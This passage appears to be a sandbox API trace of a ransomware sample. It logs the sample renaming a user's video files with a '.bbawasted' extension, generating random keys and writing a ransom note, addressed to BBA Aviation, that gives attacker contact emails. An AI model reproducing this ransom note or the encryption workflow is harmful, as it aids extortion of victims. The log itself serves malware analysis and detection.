hTemplateFile=0x0) returned 0x294 [0230.516] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0230.516] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x6925 [0230.517] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6925) returned 0x5f0000 [0230.517] CloseHandle (hObject=0x294) returned 1 [0230.518] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0230.518] CloseHandle (hObject=0x290) returned 1 [0230.518] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0230.519] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a62c8) returned 1 [0230.519] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0230.519] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0230.519] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6460) returned 1 [0230.520] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0230.520] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0230.531] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0230.531] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0230.531] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.531] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]eU1r7NjzgRmjzAYtpeX+MaoUyLWzdghf9u1vq+vvAhiVGVB8nVdyZT5j709z126j\r\nQ589vICjxzQ5nQdC4Nz9XFP7ZGK5+0MvBkjXU6dm3CTUHoxEbUBp1d78UD3bj5av\r\nLqMJ+eHKNmx8ibpGbu9Qja0o3rE9KKDBa6e0Y/OHdtwiyqovkRLNgpX5NURliDDJ\r\nbqipdDkl5syfjkAnOmCtKPXlvEIm1dpipTyY65W9viI3Y5KKxSUFSGVawyGlnuaG\r\nnwWHbryi95D2yoFm7wkWBlLX+8JftIEc/iefOpsLMgR6STOSULrsYUNmbKPncTXO\r\nDiDOQBKlDKhFGU1qwU1RE/z3UsUb4EIxErxlF2EkY6QE8l9L+ejRU7WhmjDOWwdD\r\nOlxse+eOsU53Pfn6dgXMqZiqjfPLAD4KwaGHKd2Lhcaw2XwLK95fpksHNqNU2TTU\r\nvVTaEBeMnw9Ob1QyLbiFPwyyhZQHfIgwvmi6MHKqZse/9ok5hWbMN/lPGoDZQoaD\r\nUhJWxYi/PzBwcPuQ3coKpRGXKJqNkyU0EwZ602RNYTg15rMoqSauJ6YVYP+0f3qA\r\newAk4m3rrDxMuv1VV3WfY3hn6jSoGd0mVZ69ZHIBIG24zHDwJGlZ9XbnLRXfZ5Qi\r\neIGJiiA+s4e178QP1ugyLrfG5deI0o34yxrTweyMceW=[end_key]\r\nKEEP IT\r\n") returned 984 [0230.531] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0230.531] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0230.532] SetEndOfFile (hFile=0x27c) returned 1 [0230.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.534] CloseHandle (hObject=0x27c) returned 1 [0230.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0230.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a6fd0 | out: hHeap=0x660000) returned 1 [0230.535] _aulldvrm () returned 0x0 [0230.535] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6b48) returned 1 [0230.535] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0230.535] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0230.535] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\w 6usRTF.swf") returned 49 [0230.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26c) returned 0x6a17c0 [0230.536] lstrcpyW (in: lpString1=0x6a1822, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0230.536] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.536] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6c58) returned 1 [0230.536] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0230.536] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0230.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\w 6usRTF.swf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\w 6usrtf.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0230.537] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0230.538] SetEndOfFile (hFile=0x27c) returned 1 [0230.539] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.539] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.539] lstrcpyW (in: lpString1=0x6a1822, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0230.539] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\w 6usRTF.swf" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\w 6usrtf.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\w 6usRTF.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\w 6usrtf.swf.bbawasted")) returned 1 [0230.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\w 6usRTF.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\w 6usrtf.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0230.540] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0230.541] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xeed5 [0230.541] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xeed5) returned 0x5f0000 [0230.541] CloseHandle (hObject=0x290) returned 1 [0230.545] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0230.546] CloseHandle (hObject=0x294) returned 1 [0230.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0230.546] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a60a8) returned 1 [0230.546] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0230.546] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0230.547] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0230.547] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0230.547] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0230.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ae598 [0230.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0230.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.746] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]CqC/cSgERz4e74WSuvUdE4VJxdoZefUSJlnbvtUkwv4JbL9YNutXK9Duh1h1qKOa\r\nPJPkzN0XCdkMM2B8gVPoXMPsMLY2z7klzhCbSaudmOGtoUUbftzEtLhBAudYSdEz\r\nLJ4L/eiDAbkjLIwQXvly1jOwlSlpg5amgBtSnfg8Hz5pmrbyc2cog3fHS2jrrMXM\r\nKxB+iqqfxZlSSIylPkZ5MAUXmYHUEAgUgrjeA6tYd6w/k+gJMVHO9214tpFQDscn\r\nWvYH1XR/aItpRy1LlOZY7A2wIOFyFA31GxoBkTcWIvfW/zEviBu3N7ov6PTT6DDd\r\nQa6/Q8Qebs4cJtYlZjQuXQUjbWHL/K1FFz7o+4Fy7Rt2yQMFG/Ud7lMZdC/lK3Uu\r\nLny4CiKQmyEOdRnHn99NpYxtQ3H4vc/N21do+Hru+n9V9o9FXLYISyZl0JbOyxmS\r\nPJihd4I3QWUyq25oUCX34HgdonXoGbSnqP0j3o5xdH6rpqeA6rUX1KixKWD4nlkp\r\nYQHRmx+2Qm0UeyKof5W3zzcOXil75SJ/iXF091T2Q18FiKz0IkobsIKXoaC0GnCf\r\nPdZzMhrs7Crm3UhgAQMyi2Q1b4fDQwO9csyfUPWjPgpdfBMzNQWldh4xJloyJ04O\r\nwao+YdLYtdYk9x3l9NrGgWoKL8IIUlIfsmix4JJhOud=[end_key]\r\nKEEP IT\r\n") returned 984 [0230.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0230.746] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0230.747] SetEndOfFile (hFile=0x27c) returned 1 [0230.749] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.750] CloseHandle (hObject=0x27c) returned 1 [0230.750] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a17c0 | out: hHeap=0x660000) returned 1 [0230.750] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b11b0 | out: hHeap=0x660000) returned 1 [0230.750] _aulldvrm () returned 0x0 [0230.750] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6c58) returned 1 [0230.751] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0230.751] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0230.751] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\Jveb96XLkE.swf") returned 61 [0230.751] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x284) returned 0x6ae598 [0230.751] lstrcpyW (in: lpString1=0x6ae612, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0230.751] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.751] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a61b8) returned 1 [0230.752] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0230.752] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0230.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\Jveb96XLkE.swf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\jveb96xlke.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0230.753] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0230.754] SetEndOfFile (hFile=0x27c) returned 1 [0230.755] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.755] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.755] lstrcpyW (in: lpString1=0x6ae612, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0230.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\Jveb96XLkE.swf" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\jveb96xlke.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\Jveb96XLkE.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\jveb96xlke.swf.bbawasted")) returned 1 [0230.756] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\Jveb96XLkE.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\jveb96xlke.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0230.756] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0230.756] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x155a8 [0230.756] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x155a8) returned 0x5f0000 [0230.756] CloseHandle (hObject=0x294) returned 1 [0230.759] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0230.760] CloseHandle (hObject=0x290) returned 1 [0230.760] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0230.761] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6bd0) returned 1 [0230.761] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0230.761] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0230.762] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a60a8) returned 1 [0230.762] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0230.762] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0230.771] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0230.771] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0230.771] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.771] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]MYq2ixiMjdyd7+4e9Ggzy5/mF+1+W4HAJUV+nj8vDRCndjdHUd2Mup8E4O8InrN4\r\nOYxy7UkqNEs3qMunmhIB3jC7W3244xI4vXX9nFum3lAwNokRuJjhcq5qdPBeeMpV\r\nwmC4QVtjQaBfl/lg4Q1gqIZe0S+jjx4WaV2s/P2/CPuLz3YGU+Y4F19LCWxGk30F\r\nG01vp8bwV0/+dtfUqGeIpzHb9uoBH01vrRDIwR0YUTMGwvMm7SD2jj/+9V4+TYzM\r\nZ7VI3y9lVK8VfWQesjExC1Shd5CHw6F1Zep4tMiD3VM/C1ADE/ESZjg3Qg2DG0/M\r\nBUms3WmfUwdQi4Ff1VwfJGxAJ99Huzf4pDbfxggA2bbAMvh0YV8nyG7b0FgkF8e2\r\nxvgz5tANYnfNxvSggdgmou+lAqnAzJZrZOO+KMT+98XEnvzAbeIM7LG66Lp715/F\r\nvuaJ7ePP+k0EeKbOiIySuGv703SIdnkq+baDnyB7JnJyqFfsY02TBfwaQF1+2NDc\r\nn3Z/ALv267giL4ulbWFilBIlU08U1mz6dlBRwk5jKc9sKcUVB1n1dmt2HrQeR9pk\r\nPvVEmMJ+uUcNgZoHAwx2IMhym5vzb+eASSjXq09ewv68c6hBhdrWcouLCB09AL82\r\nNoKF6l8lCSRO4dtuPl6TUkTKPgak8ji679CFuOjmE0T=[end_key]\r\nKEEP IT\r\n") returned 984 [0230.771] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0230.771] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0230.772] SetEndOfFile (hFile=0x27c) returned 1 [0230.774] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.774] CloseHandle (hObject=0x27c) returned 1 [0230.774] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0230.774] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7258 | out: hHeap=0x660000) returned 1 [0230.774] _aulldvrm () returned 0x0 [0230.774] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6bd0) returned 1 [0230.775] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0230.775] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0230.775] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\-kocgy4iYMcCWYv6.flv") returned 81 [0230.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ac) returned 0x6ae598 [0230.776] lstrcpyW (in: lpString1=0x6ae63a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0230.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.776] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6ce0) returned 1 [0230.855] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0230.855] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0230.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\-kocgy4iYMcCWYv6.flv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\-kocgy4iymccwyv6.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0230.856] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0230.857] SetEndOfFile (hFile=0x27c) returned 1 [0230.857] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.857] lstrcpyW (in: lpString1=0x6ae63a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0230.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\-kocgy4iYMcCWYv6.flv" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\-kocgy4iymccwyv6.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\-kocgy4iYMcCWYv6.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\-kocgy4iymccwyv6.flv.bbawasted")) returned 1 [0230.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\TB2VxjdQ6sSL4ATRqD0\\mId6aD6IOvro4\\-kocgy4iYMcCWYv6.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\tb2vxjdq6ssl4atrqd0\\mid6ad6iovro4\\-kocgy4iymccwyv6.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0230.858] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0230.859] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x18bfe [0230.859] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18bfe) returned 0x5f0000 [0230.859] CloseHandle (hObject=0x290) returned 1 [0230.861] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0230.863] CloseHandle (hObject=0x294) returned 1 [0230.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0230.863] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6790) returned 1 [0230.863] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0230.863] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0230.863] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a63d8) returned 1 [0230.864] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0230.864] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0231.061] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0231.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0231.061] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 